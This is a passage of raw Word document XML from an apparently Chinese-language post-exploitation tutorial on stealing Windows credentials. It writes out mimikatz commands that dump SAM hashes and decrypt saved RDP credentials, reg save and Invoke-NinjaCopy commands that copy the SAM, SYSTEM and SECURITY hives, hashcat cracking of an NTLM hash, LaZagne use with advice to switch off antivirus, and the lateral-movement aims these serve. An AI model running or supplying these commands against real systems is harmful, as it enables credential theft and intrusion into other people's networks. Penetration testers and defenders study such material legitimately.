        <w:t>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>#强制锁屏</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>rundll32.exe user32.dll,LockWorkStation</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="53"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="d在线读取本地sam文件"/>
      <w:r>
        <w:t>(d)、在线读取本地SAM文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>以管理员运行cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注：加解密算法是可逆的，hash算法是不可逆的。但相同数据采取相同hash算法得到的结果具有一致性！（原则上知道每个数据所对应hash值即可完成逆向求解，但数据具有无穷性。）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t>可以导出当前系统中所有本地用户的哈希值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//privilege::debug，用于提升至DebugOrivilege权限；token::elevate，用于提升至SYSTEM权限；lsadump::sam，用于读取sam文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5480685" cy="2339975"/>
            <wp:effectExtent l="0" t="0" r="5715" b="698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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5480685" cy="2339975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="54"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="e离线读取本地sam文件"/>
      <w:r>
        <w:t>(e)、离线读取本地SAM文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 离线读取就是将SAM文件导出，使用Mimikatz加载并读取其中的用户的登录凭据。注意，为了提供SAM文件的安全性，windows会对SAM文件使用密钥进行加密，这个密钥存储在SYSTEM文件中，与SAM文件位于同一目录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 因为系统在运行时，这两个文件是被锁定的，所</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>需要一些工具来实现，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:r>
        <w:t>项目中提供的</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>Invoke-NinjaCopy.ps1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>来完成这项工作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination c:\temp\SAM</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination c:\temp\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 或在管理员权限下通过保存注册表的方式导出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>reg save hklm\sam sam</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//存储账号hash，并以syskey加密</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>reg save hklm\system system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//存储syskey,用来解密sam</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>reg save hklm\security security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//存储lsass缓存，并以syskey加密</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5483225" cy="1109980"/>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5483225" cy="1109980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5482590" cy="2325370"/>
            <wp:effectExtent l="0" t="0" r="381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482590" cy="2325370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>mimikatz.exe "lsadump::sam /sam:sam /system:system /security:security" exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="1543050"/>
            <wp:effectExtent l="0" t="0" r="0" b="1143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42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1543050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5483225" cy="821055"/>
            <wp:effectExtent l="0" t="0" r="3175" b="190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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5483225" cy="821055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:bookmarkEnd w:id="55"/>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="Xbfff10b5aab8c273b44357f7c85bdebceda0322"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在线hash破解工具：https://md5.cn/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5481320" cy="1294765"/>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5481320" cy="1294765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本地hash破解工具：hashcat.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hashcat.exe -a 0 -m 1000 32ed87bdb5fdc5e9cba88547376818d4 zidian.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-a 0   #字典破解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-m 1000   #hash类型，NTLM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="26644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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2664460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4762500" cy="17373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4762500" cy="1737360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>、获取常见应用软件凭据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 测试人员通常会搜索各种常见的密码存储位置，以获取用户凭据。一些特定的应用程序可以存储密码，以方便用户管理和维护，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Xmanager、TeamViewer、FileZilla、NavCat</w:t>
      </w:r>
      <w:r>
        <w:t>和各种浏览器等。通过对保存的用户凭据进行导出和解密，便可以获取登录内网服务器和各种管理后台的账号密码，来进行横向移动和访问受限资源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="a获取rdp保存的凭据"/>
      <w:r>
        <w:t>(a)、获取RDP保存的凭据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> RDP的凭据使用数据保护API以加密的形式存储在Windows的凭据管理器中，路径为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>%USERPROFILE%\AppData\Local\Microsoft\Credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 执行以下命令，查看当前主机上保存的所有连接凭据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>cmdkey /list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//查看当前保存的凭据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5482590" cy="2633345"/>
            <wp:effectExtent l="0" t="0" r="381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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5482590" cy="2633345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">dir /a %USERPROFILE%\AppData\Local\Microsoft\Credentials\*  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//遍历Credentials目录下保存的凭据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5483860" cy="200914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5483860" cy="2009140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 可以看到其中的凭据是加密的，可以尝试使用Mimikatz导出指定的RDP连接凭据，然后进行解密。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>mimikatz.exe "privilege::debug" "dpapi::cred /in:%USERPROFILE%\AppData\Local\Microsoft\Credentials\连接凭据" exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5478145" cy="2687320"/>
            <wp:effectExtent l="0" t="0" r="825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5478145" cy="2687320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 得到的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>pbData</w:t>
      </w:r>
      <w:r>
        <w:t>就是凭据的加密数据，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>guidMasterKey</w:t>
      </w:r>
      <w:r>
        <w:t>就是该凭据的GUID，记录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>guidMasterKey</w:t>
      </w:r>
      <w:r>
        <w:t>的值，然后执行以下命令:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>mimikatz.exe "privilege::debug" "sekurlsa::dpapi" exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5477510" cy="570230"/>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5477510" cy="570230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 找到与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>guidMasterKey(GUID)</w:t>
      </w:r>
      <w:r>
        <w:t>相关联的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>MasterKey</w:t>
      </w:r>
      <w:r>
        <w:t>，这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>MasterKey</w:t>
      </w:r>
      <w:r>
        <w:t>就是加密凭据所使用的密钥。记录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>MasterKey</w:t>
      </w:r>
      <w:r>
        <w:t>的值，执行以下命令，解密凭据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>mimikatz.exe "dpapi::cred /in:%USERPROFILE%\AppData\Local\Microsoft\Credentials\连接凭据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>/masterkey:masterkey的值" exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 利用</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/AlessandroZ/LaZagne" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>LaZagne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>获取RDP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>等windows保存</w:t>
      </w:r>
      <w:r>
        <w:t>凭据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>推荐，记得关杀毒</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>lazagne.exe windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5483860" cy="1891030"/>
            <wp:effectExtent l="0" t="0" r="254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5483860" cy="1891030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5483225" cy="2334895"/>
            <wp:effectExtent l="0" t="0" r="317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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5483225" cy="2334895"/>
                    </a:xfrm>
